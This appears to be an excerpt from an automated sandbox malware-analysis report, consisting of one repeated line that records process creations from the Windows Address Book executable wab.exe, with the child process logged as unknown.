              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
